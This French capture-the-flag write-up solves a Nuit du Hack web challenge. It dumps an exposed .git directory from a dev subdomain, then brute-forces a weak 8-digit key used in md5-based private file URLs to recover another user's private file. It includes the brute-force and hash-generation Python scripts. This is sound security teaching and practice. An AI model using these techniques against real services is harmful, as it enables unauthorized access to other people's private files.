Web 100 points http://quals.nuitduhack.com/challenges/view/10 http://prod.facebox.challs.nuitduhack.com/
“A shady company decided to write their own software for storing files in the cloud. No no no, this is OUR filebox. We decline any responsability in the usage of our filebox. In any event your files get lost, trashed, stolen or spy on : it's your fault, not ours.” You are investigating on the security of their cloud storage as it might have disastrous consequences if it were to get hacked by malicious actors.”
le site prod.facebox.challs.nuitduhack.com permet de créer un compte puis de se logger. On peut ensuite uploader des fichiers sur le serveur soit en public soit en privé. Dans le second cas, l'url du fichier est cachée aux autres utilisateurs).
Après avoir perdu du temps à essayer d’exécuter du code sur la machine on se dit que s'il y a un prod, il doit également y avoir un dev.
Bingo avec http://dev.facebox.challs.nuitduhack.com/ on trouve un projet git avec arborescence suivante :
http://dev.facebox.challs.nuitduhack.com/.git/config http://dev.facebox.challs.nuitduhack.com/.git/COMMIT_EDITMSG http://dev.facebox.challs.nuitduhack.com/.git/HEAD http://dev.facebox.challs.nuitduhack.com/.git/refs/heads/master http://dev.facebox.challs.nuitduhack.com/.git/logs/
La page http://dev.facebox.challs.nuitduhack.com/.git/COMMIT_EDITMSG indique le dernier commit : “hash generation function”
On peut facilement récupérer les fichiers présent sur ce dépôt avec rip-git.pl: https://github.com/ctfs/write-ups-2014/tree/master/9447-ctf-2014/tumorous https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-git.pl
On trouve le script python suivant qui permet de générer les liens des fichiers uploadés :
#!/usr/bin/env python # -*- coding: utf-8 -*- def generate_random_filename(user_id,filename): dbuser = users.query.filter_by(id=user_id).first() if dbuser.privkey is not None: return md5(str(dbuser.privkey)+filename).hexdigest() else: privkey = str(randint(10000000,99999999)) upd = users.query.filter_by(id=user_id).first() upd.privkey = privkey db.session.commit() return md5(str(privkey)+filename).hexdigest()
On nous a demandé de tester la sécurité de la plateforme, la récupération de fichier privé est une bonne faille de sécurité. Les premiers fichiers ont du être uploadé par le staff. On se rend compte qu'on doit récupérer le fichier privé confidentials.txt uploadé par l'utilisateur koffi. Heureusement un second fichier a été uploadé par cet utilisateur : paste1.txt à l'adresse http://prod.facebox.challs.nuitduhack.com/files/view/3686d78a6e9d5258773a6ae0469d3ed4
Pour trouver la clé privée de koffi, on inverse rapidement le script précédent, et on brute force la clé privé :
import hashlib for i in range(10000000,100000000): if((i % 10000000) == 0): print "%d" % (i) if(hashlib.md5(str(i)+"paste01.txt").hexdigest() == "3686d78a6e9d5258773a6ae0469d3ed4"): print "privkey found : %d" % (i) print "Done!"
Résultat : privkey found : 95594864
Avec cette clé privée on applique l'algorithme avec le fichier crendentials.txt :
import hashlib def generate_random_filename(user_id,filename): privkey = 95594864 print(hashlib.md5(str(privkey)+filename).hexdigest()) if __name__ == "__main__": generate_random_filename("koffi", "confidentials.txt")
Résultat : 35e2cb0b2e8bd40347ecd4e32767a060
On se rend donc sur sur l'url : http://prod.facebox.challs.nuitduhack.com/files/view/35e2cb0b2e8bd40347ecd4e32767a060
On obtient le flag et on valide l'épreuve.